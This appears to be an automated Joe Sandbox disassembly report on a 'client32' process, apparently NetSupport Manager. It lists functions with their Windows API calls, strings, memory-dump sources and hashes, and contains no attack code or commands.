                                                                              • Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                              • Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
                                                                              • Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                              • Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
                                                                              Function 1103A560 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _strtok.LIBCMT ref: 1103A58C
                                                                                • Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4
                                                                              • _strtok.LIBCMT ref: 1103A65C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strtok$__getptd
                                                                              • String ID: ; >
                                                                              • API String ID: 715173073-2207967850
                                                                              • Opcode ID: fcc9817da58d44c692abee018736f6133157bcb5d60b52ba9e7aec99c4f9531c
                                                                              • Instruction ID: dc0b2c440e14d8e9b0893f5a35815c2cc1279532199bfc0e3fbf521271310ba3
                                                                              • Opcode Fuzzy Hash: fcc9817da58d44c692abee018736f6133157bcb5d60b52ba9e7aec99c4f9531c
                                                                              • Instruction Fuzzy Hash: B3315B36D1426AAFDB11CAA48C40BDEBBE4DF84355F154094DC58EB280E731AD8583E1
                                                                              Function 110BC180 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowTextA.USER32(?,110BF425), ref: 110BC254
                                                                                • Part of subcall function 11152670: ShowWindow.USER32(?,00000000,110BC1E9,?,AB86ACF8,75BF7AA0,?,00000000,00000000,11185EC0,000000FF,?,110BF425,00000000,?), ref: 11152676
                                                                              Strings
                                                                              • IsA(), xrefs: 110BC23F
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110BC23A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ShowText
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 1551406749-3415836059
                                                                              • Opcode ID: 532d229f29219a7ff6c20e313694b0bfc831fc8ae43d379dc4bc4106dcf9cf0c
                                                                              • Instruction ID: 8a26eee081ce9cd5774bf5fa1ba6d960984ef53363d9d91997ef2c7f0f187873
                                                                              • Opcode Fuzzy Hash: 532d229f29219a7ff6c20e313694b0bfc831fc8ae43d379dc4bc4106dcf9cf0c
                                                                              • Instruction Fuzzy Hash: A8316179A0061A9BCB44DBA8CC90FEEF7F9FF59214F044519E516A3280DB34BA05CBA5
                                                                              Function 1103B150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _calloc.LIBCMT ref: 1103B162
                                                                              • _free.LIBCMT ref: 1103B25B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                              • String ID: CLTCONN.CPP
                                                                              • API String ID: 183652615-2872349640
                                                                              • Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                              • Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
                                                                              • Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                              • Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
                                                                              Function 110AD1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110AD1E3
                                                                                • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110AD1F3,00000000,00000001,00000000,?,11185738,000000FF,?,110ADC42,?,?,00000200,?), ref: 110ACEC4
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110ACEE1
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110ACEEE
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110ACEFC
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110ACF0A
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110ACF18
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110ACF26
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110ACF34
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110ACF42
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110ACF50
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110ACF5E
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl), ref: 110ACF6C
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110ACF7A
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110ACF88
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110ACF96
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110ACFA4
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110ACFB2
                                                                              • FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
                                                                              Strings
                                                                              • winscard.dll is NOT valid!!!, xrefs: 110AD1FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$FreeLoad_memset
                                                                              • String ID: winscard.dll is NOT valid!!!
                                                                              • API String ID: 212038770-1939809930
                                                                              • Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                              • Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
                                                                              • Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                              • Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0
                                                                              Function 1100F2A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                              • String ID: string too long
                                                                              • API String ID: 963545896-2556327735
                                                                              • Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                              • Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
                                                                              • Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                              • Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
                                                                              Function 110232A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110232D7
                                                                              • SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemText
                                                                              • String ID: ...
                                                                              • API String ID: 3367045223-440645147
                                                                              • Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                              • Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
                                                                              • Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                              • Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
                                                                              Function 110391C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32(?,?,?,00000400), ref: 110CBA0C
                                                                                • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                              • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                              • _memset.LIBCMT ref: 11039216
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemText$Window$ObjectRectShow_memset
                                                                              • String ID: 562258
                                                                              • API String ID: 3037201586-1021968743
                                                                              • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                              • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                              • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                              • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                              Function 11002180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadCursorA.USER32(00000000), ref: 11002224
                                                                              • SetCursor.USER32(00000000), ref: 1100222B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Cursor$Load
                                                                              • String ID: RA
                                                                              • API String ID: 1675784387-580505616
                                                                              • Opcode ID: c3450d3e06a1438185447beb05588274eee249374333314c23ce9c317a90928d
                                                                              • Instruction ID: bc61da0bd6f20267eee6a2bdd2e53f6656b692f616fdfc42b9d5268c008fc473
                                                                              • Opcode Fuzzy Hash: c3450d3e06a1438185447beb05588274eee249374333314c23ce9c317a90928d
                                                                              • Instruction Fuzzy Hash: EB1184B8D081E6F6E709E6F5AC94B3A329C87843C5F40C835F885C9680DA3DE800F634
                                                                              Function 1110B550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                              • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                              • API String ID: 2102423945-1777407139
                                                                              • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                              • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
                                                                              • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                              • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                              Function 11096550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 11096565
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • _memmove.LIBCMT ref: 11096594
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
